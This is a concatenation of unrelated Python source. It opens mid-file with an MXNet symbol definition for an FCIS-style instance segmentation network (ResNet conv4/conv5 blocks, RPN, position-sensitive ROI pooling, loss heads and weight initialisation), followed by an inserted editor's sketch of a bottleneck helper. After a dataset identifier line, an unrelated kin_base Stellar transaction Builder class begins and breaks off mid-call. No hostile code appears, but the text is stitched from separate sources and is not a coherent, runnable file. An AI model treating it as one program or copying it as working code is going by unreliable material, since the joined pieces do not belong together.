data=scale4b20_branch2a, act_type='relu') res4b20_branch2b = mx.symbol.Convolution(name='res4b20_branch2b', data=res4b20_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b20_branch2b = mx.symbol.BatchNorm(name='bn4b20_branch2b', data=res4b20_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b20_branch2b = bn4b20_branch2b res4b20_branch2b_relu = mx.symbol.Activation(name='res4b20_branch2b_relu', data=scale4b20_branch2b, act_type='relu') res4b20_branch2c = mx.symbol.Convolution(name='res4b20_branch2c', data=res4b20_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b20_branch2c = mx.symbol.BatchNorm(name='bn4b20_branch2c', data=res4b20_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b20_branch2c = bn4b20_branch2c res4b20 = mx.symbol.broadcast_add(name='res4b20', *[res4b19_relu, scale4b20_branch2c]) res4b20_relu = mx.symbol.Activation(name='res4b20_relu', data=res4b20, act_type='relu') res4b21_branch2a = mx.symbol.Convolution(name='res4b21_branch2a', data=res4b20_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b21_branch2a = mx.symbol.BatchNorm(name='bn4b21_branch2a', data=res4b21_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b21_branch2a = bn4b21_branch2a res4b21_branch2a_relu = mx.symbol.Activation(name='res4b21_branch2a_relu', data=scale4b21_branch2a, act_type='relu') res4b21_branch2b = mx.symbol.Convolution(name='res4b21_branch2b', data=res4b21_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b21_branch2b = mx.symbol.BatchNorm(name='bn4b21_branch2b', data=res4b21_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b21_branch2b = bn4b21_branch2b res4b21_branch2b_relu = mx.symbol.Activation(name='res4b21_branch2b_relu', data=scale4b21_branch2b, act_type='relu') res4b21_branch2c = mx.symbol.Convolution(name='res4b21_branch2c', data=res4b21_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b21_branch2c = 
mx.symbol.BatchNorm(name='bn4b21_branch2c', data=res4b21_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b21_branch2c = bn4b21_branch2c res4b21 = mx.symbol.broadcast_add(name='res4b21', *[res4b20_relu, scale4b21_branch2c]) res4b21_relu = mx.symbol.Activation(name='res4b21_relu', data=res4b21, act_type='relu') res4b22_branch2a = mx.symbol.Convolution(name='res4b22_branch2a', data=res4b21_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b22_branch2a = mx.symbol.BatchNorm(name='bn4b22_branch2a', data=res4b22_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b22_branch2a = bn4b22_branch2a res4b22_branch2a_relu = mx.symbol.Activation(name='res4b22_branch2a_relu', data=scale4b22_branch2a, act_type='relu') res4b22_branch2b = mx.symbol.Convolution(name='res4b22_branch2b', data=res4b22_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b22_branch2b = mx.symbol.BatchNorm(name='bn4b22_branch2b', data=res4b22_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b22_branch2b = bn4b22_branch2b res4b22_branch2b_relu = mx.symbol.Activation(name='res4b22_branch2b_relu', data=scale4b22_branch2b, act_type='relu') res4b22_branch2c = mx.symbol.Convolution(name='res4b22_branch2c', data=res4b22_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b22_branch2c = mx.symbol.BatchNorm(name='bn4b22_branch2c', data=res4b22_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b22_branch2c = bn4b22_branch2c res4b22 = mx.symbol.broadcast_add(name='res4b22', *[res4b21_relu, scale4b22_branch2c]) res4b22_relu = mx.symbol.Activation(name='res4b22_relu', data=res4b22, act_type='relu') return res4b22_relu def get_resnet_v1_conv5(self, conv_feat): res5a_branch1 = mx.symbol.Convolution(name='res5a_branch1', data=conv_feat, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5a_branch1 = mx.symbol.BatchNorm(name='bn5a_branch1', data=res5a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch1 = bn5a_branch1 res5a_branch2a = mx.symbol.Convolution(name='res5a_branch2a', data=conv_feat, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5a_branch2a = mx.symbol.BatchNorm(name='bn5a_branch2a', data=res5a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch2a = bn5a_branch2a res5a_branch2a_relu = mx.symbol.Activation(name='res5a_branch2a_relu', data=scale5a_branch2a, act_type='relu') res5a_branch2b = mx.symbol.Convolution(name='res5a_branch2b', data=res5a_branch2a_relu, num_filter=512, pad=(2, 2), kernel=(3, 3), stride=(1, 1), dilate=(2, 2), no_bias=True) bn5a_branch2b = mx.symbol.BatchNorm(name='bn5a_branch2b', data=res5a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch2b = bn5a_branch2b res5a_branch2b_relu = mx.symbol.Activation(name='res5a_branch2b_relu', data=scale5a_branch2b, act_type='relu') res5a_branch2c = mx.symbol.Convolution(name='res5a_branch2c', data=res5a_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5a_branch2c = mx.symbol.BatchNorm(name='bn5a_branch2c', data=res5a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5a_branch2c = bn5a_branch2c res5a = mx.symbol.broadcast_add(name='res5a', *[scale5a_branch1, scale5a_branch2c]) res5a_relu = mx.symbol.Activation(name='res5a_relu', data=res5a, act_type='relu') res5b_branch2a = 
mx.symbol.Convolution(name='res5b_branch2a', data=res5a_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5b_branch2a = mx.symbol.BatchNorm(name='bn5b_branch2a', data=res5b_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5b_branch2a = bn5b_branch2a res5b_branch2a_relu = mx.symbol.Activation(name='res5b_branch2a_relu', data=scale5b_branch2a, act_type='relu') res5b_branch2b = mx.symbol.Convolution(name='res5b_branch2b', data=res5b_branch2a_relu, num_filter=512, pad=(2, 2), kernel=(3, 3), stride=(1, 1), dilate=(2, 2), no_bias=True) bn5b_branch2b = mx.symbol.BatchNorm(name='bn5b_branch2b', data=res5b_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5b_branch2b = bn5b_branch2b res5b_branch2b_relu = mx.symbol.Activation(name='res5b_branch2b_relu', data=scale5b_branch2b, act_type='relu') res5b_branch2c = mx.symbol.Convolution(name='res5b_branch2c', data=res5b_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5b_branch2c = mx.symbol.BatchNorm(name='bn5b_branch2c', data=res5b_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5b_branch2c = bn5b_branch2c res5b = mx.symbol.broadcast_add(name='res5b', *[res5a_relu, scale5b_branch2c]) res5b_relu = mx.symbol.Activation(name='res5b_relu', data=res5b, act_type='relu') res5c_branch2a = mx.symbol.Convolution(name='res5c_branch2a', data=res5b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5c_branch2a = mx.symbol.BatchNorm(name='bn5c_branch2a', data=res5c_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5c_branch2a = bn5c_branch2a res5c_branch2a_relu = mx.symbol.Activation(name='res5c_branch2a_relu', data=scale5c_branch2a, act_type='relu') res5c_branch2b = mx.symbol.Convolution(name='res5c_branch2b', data=res5c_branch2a_relu, num_filter=512, pad=(2, 2), kernel=(3, 3), stride=(1, 1), dilate=(2, 2), no_bias=True) bn5c_branch2b = mx.symbol.BatchNorm(name='bn5c_branch2b', data=res5c_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5c_branch2b = bn5c_branch2b res5c_branch2b_relu = mx.symbol.Activation(name='res5c_branch2b_relu', data=scale5c_branch2b, act_type='relu') res5c_branch2c = mx.symbol.Convolution(name='res5c_branch2c', data=res5c_branch2b_relu, num_filter=2048, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn5c_branch2c = mx.symbol.BatchNorm(name='bn5c_branch2c', data=res5c_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale5c_branch2c = bn5c_branch2c res5c = mx.symbol.broadcast_add(name='res5c', *[res5b_relu, scale5c_branch2c]) res5c_relu = mx.symbol.Activation(name='res5c_relu', data=res5c, act_type='relu') return res5c_relu def get_rpn(self, conv_feat, num_anchors): rpn_conv = mx.sym.Convolution( data=conv_feat, kernel=(3, 3), pad=(1, 1), num_filter=512, name="rpn_conv_3x3") rpn_relu = mx.sym.Activation(data=rpn_conv, act_type="relu", name="rpn_relu") rpn_cls_score = mx.sym.Convolution( data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=2 * num_anchors, name="rpn_cls_score") rpn_bbox_pred = mx.sym.Convolution( data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=4 * num_anchors, name="rpn_bbox_pred") return rpn_cls_score, rpn_bbox_pred def get_symbol(self, cfg, is_train=True): # config alias for convenient num_classes = cfg.dataset.NUM_CLASSES num_reg_classes = (2 if cfg.CLASS_AGNOSTIC else num_classes) num_anchors = cfg.network.NUM_ANCHORS # input init if is_train: data = mx.sym.Variable(name='data') im_info = 
mx.sym.Variable(name='im_info') gt_boxes = mx.sym.Variable(name='gt_boxes') gt_masks = mx.sym.Variable(name='gt_masks') rpn_label = mx.sym.Variable(name='proposal_label') rpn_bbox_target = mx.sym.Variable(name='proposal_bbox_target') rpn_bbox_weight = mx.sym.Variable(name='proposal_bbox_weight') else: data = mx.sym.Variable(name="data") im_info = mx.sym.Variable(name="im_info") # shared convolutional layers conv_feat = self.get_resnet_v1_conv4(data) # res5 relu1 = self.get_resnet_v1_conv5(conv_feat) rpn_cls_score, rpn_bbox_pred = self.get_rpn(conv_feat, num_anchors) if is_train: # prepare rpn data rpn_cls_score_reshape = mx.sym.Reshape( data=rpn_cls_score, shape=(0, 2, -1, 0), name="rpn_cls_score_reshape") # classification rpn_cls_prob = mx.sym.SoftmaxOutput(data=rpn_cls_score_reshape, label=rpn_label, multi_output=True, normalization='valid', use_ignore=True, ignore_label=-1, name="rpn_cls_prob") # bounding box regression rpn_bbox_loss_ = rpn_bbox_weight * mx.sym.smooth_l1(name='rpn_bbox_loss_', scalar=3.0, data=(rpn_bbox_pred - rpn_bbox_target)) rpn_bbox_loss = mx.sym.MakeLoss(name='rpn_bbox_loss', data=rpn_bbox_loss_, grad_scale=1.0 / cfg.TRAIN.RPN_BATCH_SIZE) # ROI proposal rpn_cls_act = mx.sym.SoftmaxActivation( data=rpn_cls_score_reshape, mode="channel", name="rpn_cls_act") rpn_cls_act_reshape = mx.sym.Reshape( data=rpn_cls_act, shape=(0, 2 * num_anchors, -1, 0), name='rpn_cls_act_reshape') if cfg.TRAIN.CXX_PROPOSAL: rois = mx.contrib.sym.Proposal( cls_prob=rpn_cls_act_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', feature_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TRAIN.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TRAIN.RPN_POST_NMS_TOP_N, threshold=cfg.TRAIN.RPN_NMS_THRESH, rpn_min_size=cfg.TRAIN.RPN_MIN_SIZE) else: rois = mx.sym.Custom( cls_prob=rpn_cls_act_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', op_type='proposal', feat_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TRAIN.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TRAIN.RPN_POST_NMS_TOP_N, nms_threshold=cfg.TRAIN.RPN_NMS_THRESH, rpn_min_size=cfg.TRAIN.RPN_MIN_SIZE) # ROI proposal target gt_boxes_reshape = mx.sym.Reshape(data=gt_boxes, shape=(-1, 5), name='gt_boxes_reshape') group = mx.sym.Custom(rois=rois, gt_boxes=gt_boxes_reshape, gt_masks=gt_masks, op_type='proposal_annotator', num_classes=num_reg_classes, mask_size=cfg.MASK_SIZE, binary_thresh=cfg.TRAIN.BINARY_THRESH, batch_images=cfg.TRAIN.BATCH_IMAGES, cfg=cPickle.dumps(cfg), batch_rois=cfg.TRAIN.BATCH_ROIS, fg_fraction=cfg.TRAIN.FG_FRACTION) rois = group[0] label = group[1] bbox_target = group[2] bbox_weight = group[3] mask_reg_targets = group[4] else: # ROI Proposal rpn_cls_score_reshape = mx.sym.Reshape( data=rpn_cls_score, shape=(0, 2, -1, 0), name="rpn_cls_score_reshape") rpn_cls_prob = mx.sym.SoftmaxActivation( data=rpn_cls_score_reshape, mode="channel", name="rpn_cls_prob") rpn_cls_prob_reshape = mx.sym.Reshape( data=rpn_cls_prob, shape=(0, 2 * num_anchors, -1, 0), name='rpn_cls_prob_reshape') if cfg.TEST.CXX_PROPOSAL: rois = mx.contrib.sym.Proposal( cls_prob=rpn_cls_prob_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', feature_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TEST.RPN_PRE_NMS_TOP_N, 
rpn_post_nms_top_n=cfg.TEST.RPN_POST_NMS_TOP_N, threshold=cfg.TEST.RPN_NMS_THRESH, rpn_min_size=cfg.TEST.RPN_MIN_SIZE) else: rois = mx.sym.Custom( cls_prob=rpn_cls_prob_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', op_type='proposal', feat_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TEST.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TEST.RPN_POST_NMS_TOP_N, nms_threshold=cfg.TEST.RPN_NMS_THRESH, rpn_min_size=cfg.TEST.RPN_MIN_SIZE) # conv new 1 if cfg.TRAIN.CONVNEW3: conv_new_1 = mx.sym.Convolution(data=relu1, kernel=(1, 1), num_filter=1024, name='conv_new_1', attr={'lr_mult':'3.00'}) else: conv_new_1 = mx.sym.Convolution(data=relu1, kernel=(1, 1), num_filter=1024, name='conv_new_1') relu_new_1 = mx.sym.Activation(data=conv_new_1, act_type='relu', name='relu_new_1') fcis_cls_seg = mx.sym.Convolution(data=relu_new_1, kernel=(1, 1), num_filter=7*7*num_classes*2, name='fcis_cls_seg') fcis_bbox = mx.sym.Convolution(data=relu_new_1, kernel=(1, 1), num_filter=7*7*4*num_reg_classes, name='fcis_bbox') psroipool_cls_seg = mx.contrib.sym.PSROIPooling(name='psroipool_cls_seg', data=fcis_cls_seg, rois=rois, group_size=7, pooled_size=21, output_dim=num_classes*2, spatial_scale=0.0625) psroipool_bbox_pred = mx.contrib.sym.PSROIPooling(name='psroipool_bbox', data=fcis_bbox, rois=rois, group_size=7, pooled_size=21, output_dim=num_reg_classes*4, spatial_scale=0.0625) if is_train: # classification path psroipool_cls = mx.contrib.sym.ChannelOperator(name='psroipool_cls', data=psroipool_cls_seg, group=num_classes, op_type='Group_Max') cls_score = mx.sym.Pooling(name='cls_score', data=psroipool_cls, pool_type='avg', global_pool=True, kernel=(21, 21)) cls_score = mx.sym.Reshape(name='cls_score_reshape', data=cls_score, shape=(-1, num_classes)) # mask regression path label_seg = mx.sym.Reshape(name='label_seg', data=label, shape=(-1, 1, 1, 1)) seg_pred = mx.contrib.sym.ChannelOperator(name='seg_pred', data=psroipool_cls_seg, pick_idx=label_seg, group=num_classes, op_type='Group_Pick', pick_type='Label_Pick') # bbox regression path bbox_pred = mx.sym.Pooling(name='bbox_pred', data=psroipool_bbox_pred, pool_type='avg', global_pool=True, kernel=(21, 21)) bbox_pred = mx.sym.Reshape(name='bbox_pred_reshape', data=bbox_pred, shape=(-1, 4 * num_reg_classes)) else: # classification path psroipool_cls = mx.contrib.sym.ChannelOperator(name='psroipool_cls', data=psroipool_cls_seg, group=num_classes, op_type='Group_Max') cls_score = mx.sym.Pooling(name='cls_score', data=psroipool_cls, pool_type='avg', global_pool=True, kernel=(21, 21)) cls_score = mx.sym.Reshape(name='cls_score_reshape', data=cls_score, shape=(-1, num_classes)) cls_prob = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score) # mask regression path score_seg = mx.sym.Reshape(name='score_seg', data=cls_prob, shape=(-1, num_classes, 1, 1)) seg_softmax = mx.contrib.sym.ChannelOperator(name='seg_softmax', data=psroipool_cls_seg, group=num_classes, op_type='Group_Softmax') seg_pred = mx.contrib.sym.ChannelOperator(name='seg_pred', data=seg_softmax, pick_idx=score_seg, group=num_classes, op_type='Group_Pick', pick_type='Score_Pick') # bbox regression path bbox_pred = mx.sym.Pooling(name='bbox_pred', data=psroipool_bbox_pred, pool_type='avg', global_pool=True, kernel=(21, 21)) bbox_pred = mx.sym.Reshape(name='bbox_pred_reshape', data=bbox_pred, shape=(-1, 4 * num_reg_classes)) if is_train: if cfg.TRAIN.ENABLE_OHEM: labels_ohem, mask_targets_ohem, 
bbox_weights_ohem = mx.sym.Custom(op_type='BoxAnnotatorOHEM', num_classes=num_classes, num_reg_classes=num_reg_classes, roi_per_img=cfg.TRAIN.BATCH_ROIS_OHEM, cfg=cPickle.dumps(cfg), cls_score=cls_score, seg_pred=seg_pred, bbox_pred=bbox_pred, labels=label, mask_targets=mask_reg_targets, bbox_targets=bbox_target, bbox_weights=bbox_weight) cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=labels_ohem, normalization='valid', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[0]) seg_prob = mx.sym.SoftmaxOutput(name='seg_prob', data=seg_pred, label=mask_targets_ohem, multi_output=True, normalization='null', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[1] / cfg.TRAIN.BATCH_ROIS_OHEM) bbox_loss_t = bbox_weights_ohem * mx.sym.smooth_l1(name='bbox_loss_t', scalar=1.0, data=(bbox_pred - bbox_target)) bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_t, grad_scale=cfg.TRAIN.LOSS_WEIGHT[2] / cfg.TRAIN.BATCH_ROIS_OHEM) rcnn_label = labels_ohem else: cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=label, normalization='valid', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[0]) seg_prob = mx.sym.SoftmaxOutput(name='seg_prob', data=seg_pred, label=mask_reg_targets, multi_output=True, normalization='null', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[1] / cfg.TRAIN.BATCH_ROIS) bbox_loss_t = bbox_weight * mx.sym.smooth_l1(name='bbox_loss_t', scalar=1.0, data=(bbox_pred - bbox_target)) bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_t, grad_scale=cfg.TRAIN.LOSS_WEIGHT[2] / cfg.TRAIN.BATCH_ROIS) rcnn_label = label rcnn_label = mx.sym.Reshape(data=rcnn_label, shape=(cfg.TRAIN.BATCH_IMAGES, -1), name='label_reshape') cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TRAIN.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape') bbox_loss = mx.sym.Reshape(data=bbox_loss, shape=(cfg.TRAIN.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_loss_reshape') group = mx.sym.Group([rpn_cls_prob, rpn_bbox_loss, cls_prob, bbox_loss, seg_prob, mx.sym.BlockGrad(mask_reg_targets), mx.sym.BlockGrad(rcnn_label)]) else: cls_prob = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score) if cfg.TEST.ITER == 2: rois_iter2 = mx.sym.Custom(bottom_rois=rois, bbox_delta=bbox_pred, im_info=im_info, cls_prob=cls_prob, name='rois_iter2', b_clip_boxes=True, bbox_class_agnostic=True, bbox_means=tuple(cfg.TRAIN.BBOX_MEANS), bbox_stds=tuple(cfg.TRAIN.BBOX_STDS), op_type='BoxParser') # rois = mx.sym.Concat(*[rois, rois_iter2], dim=0, name='rois') psroipool_cls_seg_iter2 = mx.contrib.sym.PSROIPooling(name='psroipool_cls_seg', data=fcis_cls_seg, rois=rois_iter2, group_size=7, pooled_size=21, output_dim=num_classes*2, spatial_scale=0.0625) psroipool_bbox_pred_iter2 = mx.contrib.sym.PSROIPooling(name='psroipool_bbox', data=fcis_bbox, rois=rois_iter2, group_size=7, pooled_size=21, output_dim=num_reg_classes*4, spatial_scale=0.0625) # classification path psroipool_cls_iter2 = mx.contrib.sym.ChannelOperator(name='psroipool_cls', data=psroipool_cls_seg_iter2, group=num_classes, op_type='Group_Max') cls_score_iter2 = mx.sym.Pooling(name='cls_score', data=psroipool_cls_iter2, pool_type='avg', global_pool=True, kernel=(21, 21), stride=(21,21)) cls_score_iter2 = mx.sym.Reshape(name='cls_score_reshape', data=cls_score_iter2, shape=(-1, num_classes)) cls_prob_iter2 = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score_iter2) # mask regression path score_seg_iter2 = mx.sym.Reshape(name='score_seg', 
                data=cls_prob_iter2, shape=(-1, num_classes, 1, 1))
                seg_softmax_iter2 = mx.contrib.sym.ChannelOperator(name='seg_softmax', data=psroipool_cls_seg_iter2,
                                                                   group=num_classes, op_type='Group_Softmax')
                seg_pred_iter2 = mx.contrib.sym.ChannelOperator(name='seg_pred', data=seg_softmax_iter2,
                                                                pick_idx=score_seg_iter2, group=num_classes,
                                                                op_type='Group_Pick', pick_type='Score_Pick')
                # bbox regression path
                bbox_pred_iter2 = mx.sym.Pooling(name='bbox_pred', data=psroipool_bbox_pred_iter2, pool_type='avg',
                                                 global_pool=True, kernel=(21, 21), stride=(21, 21))
                bbox_pred_iter2 = mx.sym.Reshape(name='bbox_pred_reshape', data=bbox_pred_iter2,
                                                 shape=(-1, 4 * num_reg_classes))

                rois = mx.sym.Concat(*[rois, rois_iter2], dim=0, name='rois')
                cls_prob = mx.sym.Concat(*[cls_prob, cls_prob_iter2], dim=0, name='cls_prob')
                seg_pred = mx.sym.Concat(*[seg_pred, seg_pred_iter2], dim=0, name='seg_pred')
                bbox_pred = mx.sym.Concat(*[bbox_pred, bbox_pred_iter2], dim=0, name='box_pred')

            # reshape output
            cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TEST.BATCH_IMAGES, -1, num_classes),
                                      name='cls_prob_reshape')
            bbox_pred = mx.sym.Reshape(data=bbox_pred, shape=(cfg.TEST.BATCH_IMAGES, -1, 4 * num_reg_classes),
                                       name='bbox_pred_reshape')
            group = mx.sym.Group([rois, cls_prob, bbox_pred, seg_pred])

        self.sym = group
        return group

    def init_weight(self, cfg, arg_params, aux_params):
        arg_params['rpn_conv_3x3_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['rpn_conv_3x3_weight'])
        arg_params['rpn_conv_3x3_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['rpn_conv_3x3_bias'])
        arg_params['rpn_cls_score_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['rpn_cls_score_weight'])
        arg_params['rpn_cls_score_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['rpn_cls_score_bias'])
        arg_params['rpn_bbox_pred_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['rpn_bbox_pred_weight'])
        arg_params['rpn_bbox_pred_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['rpn_bbox_pred_bias'])
        arg_params['conv_new_1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['conv_new_1_weight'])
        arg_params['conv_new_1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['conv_new_1_bias'])
        arg_params['fcis_cls_seg_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fcis_cls_seg_weight'])
        arg_params['fcis_cls_seg_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fcis_cls_seg_bias'])
        arg_params['fcis_bbox_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fcis_bbox_weight'])
        arg_params['fcis_bbox_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fcis_bbox_bias'])
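
# ---------------------------------------------------------------------------
# Editor's illustrative sketch (not part of the original file).  Every
# res4b*/res5* block above repeats the same bottleneck pattern: 1x1 conv ->
# frozen BatchNorm, ReLU, 3x3 conv -> BatchNorm, ReLU, 1x1 conv -> BatchNorm,
# an identity shortcut added with broadcast_add, then a final ReLU.  The
# helper below is a hypothetical refactoring of that pattern; the function
# name and its parameter names are assumptions made for illustration, and it
# only covers the identity-shortcut units (not projection blocks such as
# res5a with its branch1 convolution).
import mxnet as mx  # already imported at the top of the original module


def bottleneck_unit(data, prefix, num_mid, num_out, eps, dilate=(1, 1)):
    """Build one ResNet bottleneck unit using the same symbols as above."""
    branch = data
    # (suffix, num_filter, kernel, pad) for the 1x1 -> 3x3 -> 1x1 branch;
    # the 3x3 convolution uses pad == dilate, matching the blocks above.
    specs = [('2a', num_mid, (1, 1), (0, 0)),
             ('2b', num_mid, (3, 3), dilate),
             ('2c', num_out, (1, 1), (0, 0))]
    for suffix, num_filter, kernel, pad in specs:
        branch = mx.symbol.Convolution(name='res%s_branch%s' % (prefix, suffix), data=branch,
                                       num_filter=num_filter, pad=pad, kernel=kernel, stride=(1, 1),
                                       dilate=dilate if suffix == '2b' else (1, 1), no_bias=True)
        branch = mx.symbol.BatchNorm(name='bn%s_branch%s' % (prefix, suffix), data=branch,
                                     use_global_stats=True, fix_gamma=False, eps=eps)
        if suffix != '2c':
            # no ReLU after the last BatchNorm; it comes after the shortcut add
            branch = mx.symbol.Activation(name='res%s_branch%s_relu' % (prefix, suffix),
                                          data=branch, act_type='relu')
    out = mx.symbol.broadcast_add(name='res%s' % prefix, *[data, branch])
    return mx.symbol.Activation(name='res%s_relu' % prefix, data=out, act_type='relu')

# For example, the res4b22 unit defined above corresponds to
#     res4b22_relu = bottleneck_unit(res4b21_relu, '4b22', 256, 1024, self.eps)
# ---------------------------------------------------------------------------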
the-stack_106_24314
# coding: utf-8
import binascii
import warnings

from .asset import Asset
from .keypair import Keypair
from . import memo
from .network import NETWORKS, Network
from . import operation
from .transaction import Transaction
from .transaction_envelope import TransactionEnvelope as Te
from .exceptions import SequenceError
from .horizon import Horizon
from .operation import Operation

from typing import Union, Optional, TypeVar

T = TypeVar('T', bound='Builder')


class Builder:
    """The :class:`Builder` object, which uses the builder pattern to create
    a list of operations in a :class:`Transaction`, ultimately to be submitted
    as a :class:`TransactionEnvelope` to the network via Horizon (see
    :class:`Horizon`).

    :param secret: The base32 secret seed for the source address.
    :param horizon: The horizon instance to use for submitting the created
        transaction.
    :param network_name: The network to connect to for verifying and retrieving
        additional attributes from. 'PUBLIC' is an alias for
        'Public Global Stellar Network ; September 2015', 'TESTNET' is an alias
        for 'Test SDF Network ; September 2015'. Defaults to TESTNET.
    :param sequence: The sequence number to use for submitting this transaction
        with (must be the *current* sequence number of the source account).
    :param fee: The network base fee is currently set to 100 stroops
        (0.00001 lumens). Transaction fee is equal to base fee times the number
        of operations in this transaction.
    """

    def __init__(self,
                 horizon: Horizon,
                 network_name: str,
                 fee: int,
                 secret: str,
                 sequence: Optional[Union[int, str]] = None):
        # TODO: get keypair instead of seed, no need to do cryptographic operation on every build
        self.keypair = Keypair.from_seed(secret)
        self.address = self.keypair.address().decode()
        self.network_name = network_name
        self.horizon = horizon
        self.sequence = sequence
        self.ops = []
        self.time_bounds = None
        self.memo = memo.NoneMemo()
        self.fee = fee
        self.tx = None
        self.te = None

    def append_op(self, operation: Operation) -> 'Builder':
        """Append an :class:`Operation <kin_base.operation.Operation>` to the
        list of operations.

        Add the operation specified if it doesn't already exist in the list of
        operations of this :class:`Builder` instance.

        :param operation: The operation to append to the list of operations.
        :return: This builder instance.
        """
        if operation not in self.ops:
            self.ops.append(operation)
        return self

    def append_create_account_op(self,
                                 destination: str,
                                 starting_balance: str,
                                 source: Optional[str] = None) -> 'Builder':
        """Append a :class:`CreateAccount <kin_base.operation.CreateAccount>`
        operation to the list of operations.

        :param destination: Account address that is created and funded.
        :param starting_balance: Amount of KIN to send to the newly created
            account. This KIN comes from the source account.
        :param source: The source address to deduct funds from to fund the
            new account.
        :return: This builder instance.
        """
        op = operation.CreateAccount(destination, starting_balance, source)
        return self.append_op(op)

    def append_trust_op(self, destination, code, limit=None, source=None):
        """append_trust_op will be deprecated in the future, use
        append_change_trust_op instead.

        Append a :class:`ChangeTrust <kin_base.operation.ChangeTrust>`
        operation to the list of operations.

        :param str destination: The issuer address for the asset.
        :param str code: The asset code for the asset.
        :param str limit: The limit of the new trustline.
        :param str source: The source address to add the trustline to.
        :return: This builder instance.
        """
        warnings.warn(
